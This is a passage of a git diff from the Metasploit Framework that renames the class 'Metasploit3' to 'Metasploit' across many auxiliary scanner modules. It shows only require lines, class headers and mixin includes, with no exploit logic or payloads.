a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb index 56a0b065c0..195236652b 100644 --- a/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb +++ b/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/ssl_version.rb b/modules/auxiliary/scanner/http/ssl_version.rb index ee3e135338..923d4a4368 100644 --- a/modules/auxiliary/scanner/http/ssl_version.rb +++ b/modules/auxiliary/scanner/http/ssl_version.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb index 015e81013f..2bad9d916f 100644 --- a/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/svn_scanner.rb b/modules/auxiliary/scanner/http/svn_scanner.rb index 1c2f5a2132..d11cceb9bc 100644 --- a/modules/auxiliary/scanner/http/svn_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb index 3a388d677a..9dce6d9c00 100644 --- a/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb +++ b/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb index 3c141366c7..f113be1862 100644 --- a/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb +++ b/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb index ede1e33c3c..8fb36131d0 100644 --- a/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb +++ b/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb index 53af795bcb..20b0c8da5b 100644 --- a/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb +++ b/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/symantec_web_gateway' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb index 4918004f32..31f6c026e8 100644 --- a/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb +++ b/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/title.rb b/modules/auxiliary/scanner/http/title.rb index 4b573346ae..ce2b35d325 100644 --- a/modules/auxiliary/scanner/http/title.rb +++ b/modules/auxiliary/scanner/http/title.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient # Scanner mixin should be near last diff --git a/modules/auxiliary/scanner/http/tomcat_enum.rb b/modules/auxiliary/scanner/http/tomcat_enum.rb index 9a4c1e244f..a470b6a64c 100644 --- a/modules/auxiliary/scanner/http/tomcat_enum.rb +++ b/modules/auxiliary/scanner/http/tomcat_enum.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 6847640f9c..c9f0822e19 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/tomcat' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb index c4541ac09f..49daecb2b5 100644 --- a/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb +++ b/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/trace.rb b/modules/auxiliary/scanner/http/trace.rb index 86472e9648..834a4985c7 100644 --- a/modules/auxiliary/scanner/http/trace.rb +++ b/modules/auxiliary/scanner/http/trace.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/trace_axd.rb b/modules/auxiliary/scanner/http/trace_axd.rb index 188088b406..22f050d4e3 100644 --- a/modules/auxiliary/scanner/http/trace_axd.rb +++ b/modules/auxiliary/scanner/http/trace_axd.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/typo3_bruteforce.rb b/modules/auxiliary/scanner/http/typo3_bruteforce.rb index 46fc088080..f80b2168d3 100644 --- a/modules/auxiliary/scanner/http/typo3_bruteforce.rb +++ b/modules/auxiliary/scanner/http/typo3_bruteforce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Typo3 include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/vcms_login.rb b/modules/auxiliary/scanner/http/vcms_login.rb index 329ad2b77f..8e5a5a6f26 100644 --- a/modules/auxiliary/scanner/http/vcms_login.rb +++ b/modules/auxiliary/scanner/http/vcms_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/verb_auth_bypass.rb b/modules/auxiliary/scanner/http/verb_auth_bypass.rb index 48df7dd5e2..0d01068564 100644 --- a/modules/auxiliary/scanner/http/verb_auth_bypass.rb +++ b/modules/auxiliary/scanner/http/verb_auth_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/vhost_scanner.rb b/modules/auxiliary/scanner/http/vhost_scanner.rb index 4d0484a96a..edc80bba06 100644 --- a/modules/auxiliary/scanner/http/vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/vhost_scanner.rb @@ -13,7 +13,7 @@ require 'cgi' - class Metasploit3 < Msf::Auxiliary + class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb index 163932d52a..5b0aaa7ce7 100644 --- a/modules/auxiliary/scanner/http/wangkongbao_traversal.rb +++ b/modules/auxiliary/scanner/http/wangkongbao_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/web_vulndb.rb b/modules/auxiliary/scanner/http/web_vulndb.rb index 9e768085ce..54d946ccba 100644 --- a/modules/auxiliary/scanner/http/web_vulndb.rb +++ b/modules/auxiliary/scanner/http/web_vulndb.rb @@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanServer diff --git a/modules/auxiliary/scanner/http/webdav_internal_ip.rb b/modules/auxiliary/scanner/http/webdav_internal_ip.rb index 74bf30c54b..2982abc079 100644 --- a/modules/auxiliary/scanner/http/webdav_internal_ip.rb +++ b/modules/auxiliary/scanner/http/webdav_internal_ip.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_scanner.rb b/modules/auxiliary/scanner/http/webdav_scanner.rb index 42970aac95..bdb4ce184b 100644 --- a/modules/auxiliary/scanner/http/webdav_scanner.rb +++ b/modules/auxiliary/scanner/http/webdav_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webdav_website_content.rb b/modules/auxiliary/scanner/http/webdav_website_content.rb index 4fc1b55c75..56b31643f2 100644 --- a/modules/auxiliary/scanner/http/webdav_website_content.rb +++ b/modules/auxiliary/scanner/http/webdav_website_content.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/webpagetest_traversal.rb b/modules/auxiliary/scanner/http/webpagetest_traversal.rb index cb3381d0c8..2f04fb8a7e 100644 --- a/modules/auxiliary/scanner/http/webpagetest_traversal.rb +++ b/modules/auxiliary/scanner/http/webpagetest_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index 6486a74948..600f59042b 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 9b804e4bb4..ecacc8f884 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_login_enum.rb b/modules/auxiliary/scanner/http/wordpress_login_enum.rb index 2019d21f71..08f79af4b8 100644 --- a/modules/auxiliary/scanner/http/wordpress_login_enum.rb +++ b/modules/auxiliary/scanner/http/wordpress_login_enum.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb index d52d6c8f69..d33c57fb8d 100644 --- a/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb +++ b/modules/auxiliary/scanner/http/wordpress_multicall_creds.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_multicall' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb index 702d4b6bcc..5bf85ed6e4 100644 --- a/modules/auxiliary/scanner/http/wordpress_pingback_access.rb +++ b/modules/auxiliary/scanner/http/wordpress_pingback_access.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/wordpress_scanner.rb b/modules/auxiliary/scanner/http/wordpress_scanner.rb index e4c5feef18..0172a1556f 100644 --- a/modules/auxiliary/scanner/http/wordpress_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index b46c204c6f..b09f55dc1d 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/wordpress_rpc' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 11c29161d2..2da1992725 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index d4384810b1..bf2d615f4e 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 1f9046447c..ffd4d97a66 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index 88f9ca2081..26b6179dc7 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index 51404cbbd1..f019fd4fb3 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'nokogiri' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 7f0559721d..2871fc07f1 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 001e7a8f7a..8aa30978e6 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress diff --git a/modules/auxiliary/scanner/http/xpath.rb b/modules/auxiliary/scanner/http/xpath.rb index 4c6f1bcdfe..7041bc87e2 100644 --- a/modules/auxiliary/scanner/http/xpath.rb +++ b/modules/auxiliary/scanner/http/xpath.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/yaws_traversal.rb b/modules/auxiliary/scanner/http/yaws_traversal.rb index 26e8aa1815..c36df4b5ec 100644 --- a/modules/auxiliary/scanner/http/yaws_traversal.rb +++ b/modules/auxiliary/scanner/http/yaws_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zabbix_login.rb b/modules/auxiliary/scanner/http/zabbix_login.rb index 878b786208..49a168bc3f 100644 --- a/modules/auxiliary/scanner/http/zabbix_login.rb +++ b/modules/auxiliary/scanner/http/zabbix_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/login_scanner/zabbix' require 'metasploit/framework/credential_collection' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb index c50a870fe7..bb4c8d7f4f 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb index 095f3b2717..85febf4447 100644 --- a/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb +++ b/modules/auxiliary/scanner/http/zenworks_assetmanagement_getconfig.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/imap/imap_version.rb b/modules/auxiliary/scanner/imap/imap_version.rb index 74ff3e3e3f..15c61a46aa 100644 --- a/modules/auxiliary/scanner/imap/imap_version.rb +++ b/modules/auxiliary/scanner/imap/imap_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Imap include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ip/ipidseq.rb b/modules/auxiliary/scanner/ip/ipidseq.rb index aa3e1a9244..ccbda3c467 100644 --- a/modules/auxiliary/scanner/ip/ipidseq.rb +++ b/modules/auxiliary/scanner/ip/ipidseq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'timeout' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Capture include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb index abc8d604bd..c6b812b4f3 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb index c6d1f16d8e..16473ee270 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ipmi/ipmi_version.rb b/modules/auxiliary/scanner/ipmi/ipmi_version.rb index 0c497970b6..eb8262ae6d 100644 --- a/modules/auxiliary/scanner/ipmi/ipmi_version.rb +++ b/modules/auxiliary/scanner/ipmi/ipmi_version.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex/proto/ipmi' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/kademlia/server_info.rb b/modules/auxiliary/scanner/kademlia/server_info.rb index 0f1c4508df..c697f48658 100644 --- a/modules/auxiliary/scanner/kademlia/server_info.rb +++ b/modules/auxiliary/scanner/kademlia/server_info.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::Kademlia diff --git a/modules/auxiliary/scanner/llmnr/query.rb b/modules/auxiliary/scanner/llmnr/query.rb index 74a8687efb..f7a131840e 100644 --- a/modules/auxiliary/scanner/llmnr/query.rb +++ b/modules/auxiliary/scanner/llmnr/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::LLMNR diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb index 19a35e271d..23181a3746 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_hashes.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb index c3e9ac94a5..40306e09e1 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_login.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_login.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb index 6df88ba9ee..96e3024d25 100644 --- a/modules/auxiliary/scanner/lotus/lotus_domino_version.rb +++ b/modules/auxiliary/scanner/lotus/lotus_domino_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mdns/query.rb b/modules/auxiliary/scanner/mdns/query.rb index 4412818e31..98e96310ae 100644 --- a/modules/auxiliary/scanner/mdns/query.rb +++ b/modules/auxiliary/scanner/mdns/query.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Msf::Auxiliary::MDNS diff --git a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb index 2a1337914a..919d93d302 100644 --- a/modules/auxiliary/scanner/misc/cctv_dvr_login.rb +++ b/modules/auxiliary/scanner/misc/cctv_dvr_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 427053995b..7da849808a 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -1,4 +1,4 @@ -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index c497a8ff3d..47bed435ea 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index e50e477f5e..2adcd28017 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class Metasploit < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index f62eb75a58..c165dbbfd2 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class 